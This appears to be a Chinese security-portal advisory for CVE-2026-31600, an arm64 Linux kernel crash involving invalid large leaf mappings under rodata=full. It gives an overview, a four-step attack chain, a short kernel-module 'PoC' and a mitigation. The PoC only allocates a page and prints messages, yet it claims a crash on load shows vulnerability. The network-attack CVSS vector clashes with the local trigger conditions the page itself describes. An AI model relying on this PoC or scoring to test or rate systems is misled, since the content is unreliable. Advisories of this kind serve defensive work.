CVE-2026-31600 CVSS 7.5 高危

CVE-2026-31600: Linux内核arm64内存管理拒绝服务漏洞

披露日期: 2026-04-24

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31600

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核arm64架构的内存管理代码在处理无效大叶映射时存在缺陷。当启用rodata=full并清除PTE_VALID位使大块映射无效时，内核无法正确处理该状态。在特定场景（如Realm Guest启动或DMA操作）下，访问此类映射会导致Level 2翻译错误，进而引发内核恐慌和系统崩溃。

技术细节

该漏洞源于Linux内核对arm64架构线性映射中页表项（PTE）的处理逻辑。传统上，内核通过清除PTE_VALID位来标记4KB页为无效，用于保护内存（如secretmem）。然而，引入大块映射支持后，部分底层代码（如swiotlb）未适配这种“无效的大叶映射”。当系统尝试通过swiotlb_bounce等机制拷贝数据到这些区域时，硬件触发Level 2 translation fault (ESR=0x96000046)。由于内核未正确处理此异常，导致执行流中断，最终在swapper/0进程中触发panic，导致拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者诱导系统进入特定状态（如Realm Guest启动）或等待系统执行DMA操作。

STEP 2

步骤2

内核内存管理模块尝试处理被标记为无效的大叶映射。

STEP 3

步骤3

处理器在访问这些无效映射时触发Level 2 Translation Fault。

STEP 4

步骤4

内核未正确处理该异常，导致内核恐慌，系统崩溃重启。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC Concept for CVE-2026-31600
 * This kernel module attempts to trigger the invalid large leaf mapping issue.
 * Compile with: make -C /lib/modules/$(uname -r)/build M=$(pwd) modules
 * WARNING: This may cause kernel panic on vulnerable systems.
 */

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/set_memory.h>

int init_module(void) {
    void *addr;
    struct page *page;

    // Allocate a page that might fall into a large block mapping area
    // depending on kernel config (rodata=full)
    page = alloc_page(GFP_KERNEL);
    if (!page) {
        printk(KERN_ALERT "Failed to allocate page\n");
        return -ENOMEM;
    }

    addr = page_address(page);
    printk(KERN_INFO "Attempting to manipulate page at %p\n", addr);

    // On vulnerable kernels, specific manipulations or just the existence
    // of invalid large leafs during DMA operations (like swiotlb) can trigger the crash.
    // This is a simplified representation of the condition.
    // Real trigger often requires Realm Guest or specific DMA bounce buffer usage.

    printk(KERN_INFO "Module loaded. If kernel crashes, system is vulnerable.\n");
    return 0;
}

void cleanup_module(void) {
    printk(KERN_INFO "Module unloaded.\n");
}

MODULE_LICENSE("GPL");
MODULE_AUTHOR("Security Analyst");
MODULE_DESCRIPTION("PoC for CVE-2026-31600");

影响范围

Linux Kernel < 6.6 (specifically before commits 15bfba1ad77f, 747b6482e4e2, etc.)

防御指南

临时缓解措施

在不影响业务的前提下，暂时禁用内核启动参数中的'rodata=full'选项，或者避免在不稳定的主机配置上运行Realm Guest。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表